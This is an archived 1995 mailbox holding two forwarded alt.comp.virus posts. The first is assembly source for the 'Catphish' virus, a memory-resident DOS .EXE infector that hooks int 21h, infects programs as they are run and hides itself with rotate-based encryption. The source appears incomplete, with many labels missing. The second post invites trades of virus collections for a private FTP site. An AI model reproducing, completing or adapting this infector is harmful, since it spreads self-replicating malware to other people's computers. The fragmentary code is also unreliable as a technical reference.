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From smtp Sun Jan 29 16:25 EST 1995
Received: from ids.net by POBOX.jwu.edu; Sun, 29 Jan 95 16:25 EST
Date: Sun, 29 Jan 1995 16:18:52 -0500 (EST)
From: ids.net!JOSHUAW (JOSHUAW)
To: pobox.jwu.edu!joshuaw
Content-Length: 11874
Content-Type: text
Message-Id: <950129161852.10074@ids.net>
Status: RO
To: joshuaw@pobox.jwu.edu
Subject: (fwd) CATPHISH.ASM
Newsgroups: alt.comp.virus
Path: paperboy.ids.net!uunet!cs.utexas.edu!uwm.edu!msunews!news.mtu.edu!news.mtu.edu!not-for-mail
From: jdmathew@mtu.edu (Icepick)
Newsgroups: alt.comp.virus
Date: 26 Jan 1995 13:06:15 -0500
Organization: Michigan Technological University
Lines: 486
Message-ID: <3g8oan$54g@maxwell11.ee>
NNTP-Posting-Host: maxwell11.ee.mtu.edu
X-Newsreader: TIN [version 1.2 PL1]
code segment
assume cs:code, ds:code, es:code
org 100h
; The Catphish Virus.
; The Catphish virus is a resident .EXE infector.
; Size: 678 bytes (decimal).
; No activation (bomb).
; Saves date and file attributes.
; If assembling, check_if_resident jump must be marked over
; with nop after first execution (first execution will hang
; system).
; *** Source is made available to learn from, not to
; change author's name and claim credit! ***
call setup ; Find "delta offset".
pop bp
sub bp, offset setup-100h
jmp check_if_resident ; See note above about jmp!
mov bx,offset infect_header-100h
add bx,bp
mov cx,endcrypt-infect_header
mov dl,byte ptr cs:[bx]
ror dl,1 ; Decrypt virus code
mov byte ptr cs:[bx],dl ; by rotating right.
inc bx
loop ror_em
jmp check_if_resident
;--------------------------------- Infect .EXE header -----------------------
; The .EXE header modifying code below is my reworked version of
; Dark Angel's code found in his Phalcon/Skism virus guides.
push bx
push dx
push ax
mov bx, word ptr [buffer+8-100h] ; Header size in paragraphs
; ^---make sure you don't destroy the file handle
mov cl, 4 ; Multiply by 16. Won't
shl bx, cl ; work with headers > 4096
; bytes. Oh well!
sub ax, bx ; Subtract header size from
sbb dx, 0 ; file size
; Now DX:AX is loaded with file size minus header size
mov cx, 10h ; DX:AX/CX = AX Remainder DX
div cx
mov word ptr [buffer+14h-100h], dx ; IP Offset
mov word ptr [buffer+16h-100h], ax ; CS Displacement in module
mov word ptr [buffer+0Eh-100h], ax ; Paragraph disp. SS
mov word ptr [buffer+10h-100h], 0A000h ; Starting SP
pop ax
pop dx
add ax, endcode-start ; add virus size
cmp ax, endcode-start
jb fix_fault
jmp execont
war_cry db 'Cry Havoc, and let slip the Dogs of War!',0
v_name db '[Catphish]',0 ; Virus name.
v_author db 'FirstStrike',0 ; Me.
v_stuff db 'Kraft!',0
add dx,1d
push ax
mov cl, 9
shr ax, cl
ror dx, cl
adc dx, ax
pop ax
and ah, 1
mov word ptr [buffer+4-100h], dx ; Fix-up the file size in
mov word ptr [buffer+2-100h], ax ; the EXE header.
pop bx
retn ; Leave subroutine
push es
xor ax,ax
mov es,ax
cmp word ptr es:[63h*4],0040h ; Check to see if virus
jnz grab_da_vectors ; is already resident
jmp exit_normal ; by looking for a 40h
; signature in the int 63h
; offset section of
; interrupt table.
mov ax,3521h ; Store original int 21h
int 21h ; vector pointer.
mov word ptr cs:[bp+dos_vector-100h],bx
mov word ptr cs:[bp+dos_vector+2-100h],es
push ds
find_chain: ; Load high routine that
; uses the DOS internal
mov ah,52h ; table function to find
int 21h ; start of MCB and then
; scales up chain to
mov ds,es: word ptr [bx-2] ; find top. (The code
assume ds:nothing ; is long, but it is the
; only code that would
xor si,si ; work when an infected
; .EXE was to be loaded
Middle_check: ; into memory.
cmp byte ptr ds:[0],'M'
jne Check4last
mov ax,ds
add ax,ds:[3]
inc ax
mov ds,ax
jmp Middle_check
cmp byte ptr ds:[0],'Z'
jne Error
mov byte ptr ds:[0],'M'
sub word ptr ds:[3],(endcode-start+15h)/16h+1
jmp add_one
mov byte ptr ds:[0],'Z'
mov word ptr ds:[1],008h
mov word ptr ds:[3],(endcode-start+15h)/16h+1
push ds
pop ax
inc ax
push ax
pop es
mov bx,offset start-100h ; Move virus into carved
add bx,bp ; out location in memory.
mov cx,endcode-start
push bp
mov bp,0000h
mov dl, byte ptr cs:[bx]
mov byte ptr es:[bp],dl
inc bp
inc bx
loop move_it
pop bp
mov ax,2563h ; Hook the int 21h vector
mov dx,0040h ; which means it will
int 21h ; point to virus code in
; memory.
mov ax,2521h
mov dx,offset virus_attack-100h
push es
pop ds
int 21h
pop ds
exit_normal: ; Return control to
pop es ; infected .EXE
mov ax, es ; (Dark Angle code.)
add ax, 10h
add word ptr cs:[bp+OrigCSIP+2-100h], ax
add ax, word ptr cs:[bp+OrigSSSP+2-100h]
mov ss, ax
mov sp, word ptr cs:[bp+OrigSSSP-100h]
xor ax,ax
xor bp,bp
endcrypt label byte
db 0eah
OrigCSIP dd 0fff00000h
OrigSSSP dd ?
exe_attrib dw ?
date_stamp dw ?
time_stamp dw ?
dos_vector dd ?
buffer db 18h dup(?) ; .EXE header buffer.
virus_attack proc far
assume cs:code,ds:nothing, es:nothing
cmp ax,4b00h ; Infect only on file
jz run_kill ; executions.
jmp dword ptr cs:[dos_vector-100h]
call infectexe
jmp leave_virus
infectexe: ; Same old working horse
push ax ; routine that infects
push bx ; the selected file.
push cx
push es
push dx
push ds
mov cx,64d
mov bx,dx
cmp byte ptr ds:[bx],'.'
jz o_k
inc bx
loop findname
jmp get_out
cmp byte ptr ds:[bx+1],'E' ; Searches for victims.
jnz pre_get_out
cmp byte ptr ds:[bx+2],'X'
jnz pre_get_out
cmp byte ptr ds:[bx+3],'E'
jnz pre_get_out
mov ax,4300h
call dosit
mov word ptr cs:[exe_attrib-100h],cx
mov ax,4301h
xor cx,cx
call dosit
mov ax,3d02h
call dosit
xchg bx,ax
mov ax,5700h
call dosit
mov word ptr cs:[time_stamp-100h],cx
mov word ptr cs:[date_stamp-100h],dx
push cs
pop ds
mov ah,3fh
mov cx,18h
mov dx,offset buffer-100h
call dosit
cmp word ptr cs:[buffer+12h-100h],1993h ; Looks for virus marker
jnz infectforsure ; of 1993h in .EXE
jmp close_it ; header checksum
; position.
call move_f_ptrfar
push ax
push dx
call store_header
pop dx
pop ax
call infect_header
push bx
push cx
push dx
mov bx,offset infect_header-100h
mov cx,(endcrypt)-(infect_header)
rol_em: ; Encryption via
mov dl,byte ptr cs:[bx] ; rotating left.
rol dl,1
mov byte ptr cs:[bx],dl
inc bx
loop rol_em
pop dx
pop cx
pop bx
mov ah,40h
mov cx,endcode-start
mov dx,offset start-100h
call dosit
mov word ptr cs:[buffer+12h-100h],1993h
call move_f_ptrclose
mov ah,40h
mov cx,18h
mov dx,offset buffer-100h
call dosit
mov ax,5701h
mov cx,word ptr cs:[time_stamp-100h]
mov dx,word ptr cs:[date_stamp-100h]
call dosit
mov ah,3eh
call dosit
pop ds
pop dx
mov ax,4301h
mov cx,word ptr cs:[exe_attrib-100h]
call dosit
pop es
pop cx
pop bx
pop ax
;---------------------------------- Call to DOS int 21h ---------------------
dosit: ; DOS function call code.
call dword ptr cs:[dos_vector-100h]
;-------------------------------- Store Header -----------------------------
les ax, dword ptr [buffer+14h-100h] ; Save old entry point
mov word ptr [OrigCSIP-100h], ax
mov word ptr [OrigCSIP+2-100h], es
les ax, dword ptr [buffer+0Eh-100h] ; Save old stack
mov word ptr [OrigSSSP-100h], es
mov word ptr [OrigSSSP+2-100h], ax
;---------------------------------- Set file pointer ------------------------
move_f_ptrfar: ; Code to move file pointer.
mov ax,4202h
jmp short move_f
mov ax,4200h
xor dx,dx
xor cx,cx
call dosit
endcode label byte
code ends
end start
From smtp Fri Jan 27 13:23 EST 1995
Received: from ids.net by POBOX.jwu.edu; Fri, 27 Jan 95 13:23 EST
Date: Fri, 27 Jan 1995 13:21:38 -0500 (EST)
From: ids.net!JOSHUAW (JOSHUAW)
To: pobox.jwu.edu!joshuaw
Content-Length: 1179
Content-Type: binary
Message-Id: <950127132138.b52b@ids.net>
Status: RO
To: joshuaw@pobox.jwu.edu
Subject: (fwd) Private Virii FTP Site
Newsgroups: alt.comp.virus
Path: paperboy.ids.net!uunet!nntp.crl.com!crl12.crl.com!not-for-mail
From: yojimbo@crl.com (Douglas Mauldin)
Newsgroups: alt.comp.virus
Subject: Private Virii FTP Site
Date: 24 Jan 1995 22:01:53 -0800
Organization: CRL Dialup Internet Access (415) 705-6060 [Login: guest]
Lines: 14
Message-ID: <3g4pgh$ka2@crl12.crl.com>
NNTP-Posting-Host: crl12.crl.com
X-Newsreader: TIN [version 1.2 PL2]
I run THe QUaRaNTiNE, a private FTP site for viral reseachers/coders. I'm
always on the lookout for new viral material. If you'd like access, or
like to trade, email me a list of your collection.
Serious inquiries only.
<EFBFBD> SysOp: The Dojo BBS <EFBFBD> Quiet as the Forest <EFBFBD>
<EFBFBD> 1.7i3.436.1795 <EFBFBD> Aggressive as Fire <EFBFBD>
<EFBFBD> THe ULTiMaTE ViRaL InFeCTiON <EFBFBD> Immovable as a Mountain <EFBFBD>